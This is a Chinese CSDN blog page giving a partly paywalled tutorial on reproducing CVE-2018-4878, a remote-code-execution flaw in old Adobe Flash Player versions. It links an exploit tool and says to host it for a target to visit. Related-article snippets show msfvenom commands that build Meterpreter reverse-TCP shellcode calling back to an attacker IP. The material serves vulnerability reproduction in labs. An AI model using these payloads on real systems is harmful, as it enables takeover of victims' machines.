CVE-2018-4878 flash 漏洞利用教程

最新推荐文章于 2024-08-29 11:05:11 发布
最新推荐文章于 2024-08-29 11:05:11 发布
阅读量1.5k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41924764/article/details/109263837
版权

目录

漏洞描述

  此漏洞是针对与安装flash 28.0.0.137版本及小于此版本的用户,攻击者诱导用户点击恶意网站,可直接获取shell权限。


影响版本

小于或等于 Adobe Flash Player 28.0.0.137 版本


漏洞检测

利用工具:
https://github.com/anbai-inc/CVE-2018-4878

将index.html与exploit.swf放到我们自己的web服务器上,让目标机去访问。有时能弹出计算机,有时会出现ie浏览器崩溃,估计是脚本不稳定的原因。

在这里插入图片描述

在这里插入图片描述


漏洞利用

了解本专栏 订阅专栏 解锁全文 超级会员免费看
凝聚力安全团队
关注
专栏目录
订阅专栏
Flash漏洞(CVE-2018-4878 )复现
玄道的网安博客
07-29 1377
简介 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。 影响版本 FlashPlayer28.0.0.137及以前的所有版本 漏洞复现 使用msfvenom生成shell代码 生成代码,其中lhost为kali的ip地址,lport为自定义的端口号 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.129 lport=66.
CVE-2018-4878的复现
大方子
10-07 4343
前言: CVE-2018-4878利用flash的漏洞来进行攻击,如果受害者的flash版本在28.0.0.137及其之前,那么攻击者可以通过诱使受害者点击链接访问特定网页来控制受害者的电脑。 1 漏洞影响范围 Flash Player28.0.0.137及以前的所有版本 2 漏洞复现 2.1 测试环境 攻击机:kali2017 靶机:win7_x64+IE8+FLASH_playe...
flash漏洞利用CVE-2018-4878
06-14
flash漏洞利用CVE-2018-4878。 。。。
掌握Flash时间帧动画技术与实践
weixin_32836713的博客
08-29 535
本文还有配套的精品资源,点击获取 简介:Flash中的时间帧动画是一种通过精确控制时间流逝和帧序列来创建动画的技术,特别适用于需要动态交互和复杂动作序列的项目。本指南详细讲解了时间帧动画的概念,AS3.0中 TimelineControl 和 Tween 类的使用,以及脚本如何控制时间帧。还包括了提高动画效率和自然性的优化技巧和最佳实践。 ...
flash漏洞所用shellcode的分析
06-03 1042
作 者: 轩辕小聪时 间: 2008-06-02,19:29链 接: http://bbs.pediy.com/showthread.php?t=65907作者主页: http://hi.baidu.com/yicong2007目    的: 纯属学习,请勿用于恶意用途最近几天flash漏洞的网马非常流行,于是我想分析一下shellcode是怎么跑的。但是能力所限,还难以像大牛们一样定位到有漏洞的
Flash Player漏洞利用"Exploiting Flash Reliably"
weixin_34049032的博客
04-16 99
以下消息来自幻影论坛[Ph4nt0m]邮件组 前两天推荐过Mark Dowd的Paper “Exploiting Flash Reliably”[url]http://hi.baidu.com/secway/blog/item/242655971275376855fb96d8.html[/url]学习了一下,很好很强大。为以后Flash Player漏洞的利用开辟了一...
cve-2018-4878漏洞复现
06-02 4619
靶机:Windows7 sp1 条件:Adobe Flash 28.0.0.137及其之前的版本     IE8浏览器及以前版本(IE9好像也行) 所需工具已上传 kali:192.168.43.16 (需要输入的命令均用<>标记出来,<>不需要输入) 准备工作: kali中打开终端,找到下载的cve-2018-4878工具,切换到该路径(这种工具在未来应该尽量...
CVE-2018-4878 flash漏洞复现
wh1te 小白的博客
10-22 1194
先将cve-2018-4878拖入虚拟机中 使用msfvenom生成shell代码 lhost为攻击机ip地址  lport为自定义端口号 查看代码文件  进入CVE-2018-4878-master目录,编辑CVE-2018-4878.py文件 将上面msfvenom生成的代码覆盖掉原来的代码: 确认CVE-2018-4878.py下面的文件信息(后面会用到,之后保存...
flashActiveX_27.0.0.183.exe
10-28
Adobe Flash Player是一种广泛使用的、专有的多媒体程序播放器。它最初由Macromedia编写,在Macromedia被Adobe收购后由Adobe继续开发并分发。Adobe Flash Player 最初设计目的为播放2维向量动画,但至此之后成为适合开发创造丰富型互联网应用程序、流视频音频的工具。Flash Player使用矢量图形的技术来最小化文件的大小以及创造节省网络带宽和下载时间的文件。因此Flash 成为嵌入网页中的小游戏、动画以及图形用户界面常用的格式。
CVE-2018-4878 漏洞复现
qq_42039946的博客
05-14 1111
1.生成shellcode msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.130 lport=8888 -f python>shellcode.txt lhost的修改为自己kali平台的IP,端口号也可以自行修改 2.查看shellcode root@kali:~# cat shellcode.txt 3.编辑CVE-2018-4878-master.py文件 3.1 替换shellcode 3.2修改swf..
本地复现Flash 0day漏洞(CVE-2018-4878)
weixin_30627381的博客
03-17 403
影响版本: Adobe Flash Player <= 28.0.0.137 EXP下载地址: 链接: https://pan.baidu.com/s/1_VVQfdx6gsJvEDJj51JgMQ 密码: d8tm 漏洞复现: 攻击机:kail 靶机:win7 x64 浏览器:360浏览器 0x01 生成shellcode msfvenom -p windows...
[漏洞复现] CVE-2018-4878 Flash 0day
神仙哥哥的博客
05-23 2823
1、漏洞概述 2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。 直到2018年2月5号,Adboe才发布补丁来修复此0...
Flash 0day漏洞(CVE-2018-4878复现)
weixin_44897902的博客
10-14 464
漏洞名:CVE-2018-4878 危害:造成远程命令执行 影响范围:Flash Player28.0.0.137及以前的所有版本 准备工作: kail: 192.168.91.146 win7,Flash Player28.0.0.137,IE8 这是一位前辈的Player: 链接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li0 事...
漏洞实验:CVE-2018-15982-Adobe Flash Player远程代码执行漏洞
KEY0NE的个人博客
12-26 454
漏洞简介漏洞名称Adobe Flash Player远程代码执行漏洞威胁类型远程代码执行威胁等级高漏洞IDCVE-2018-15982利用场景攻击者通过网页下载、电子邮件、即时通讯等渠道向受害者发送恶意构造的Office文件诱使其打开处理,可能触发漏洞在用户系统上执行任意指令获取控制。受影响系统及应用版本Adobe Flash Player(31.0.0.153及...
CVE-2018-19422
最新发布
08-30
CVE-2018-19422是一个安全漏洞标识符,通常用于描述软件中的安全缺陷。它发生在Adobe Flash Player这个产品上,这是一个早期的、广泛使用的浏览器插件,用于播放视频和交互式内容。此漏洞属于“反射型”类型的跨站脚本攻击(Cross-Site Scripting, XSS),意味着攻击者能够通过诱骗用户访问恶意网站或打开包含恶意链接的内容,利用Flash Player中的漏洞将恶意脚本注入用户的浏览器环境。 攻击者可以借助这个漏洞控制受害者的浏览器,执行未经授权的操作,如窃取敏感信息或安装额外的恶意软件。由于Flash Player逐渐被淘汰,现代浏览器默认禁用了它,因此这个漏洞的风险已经大大降低。不过,对于仍在使用旧版Flash的系统,修复这一漏洞是非常重要的安全措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凝聚力安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值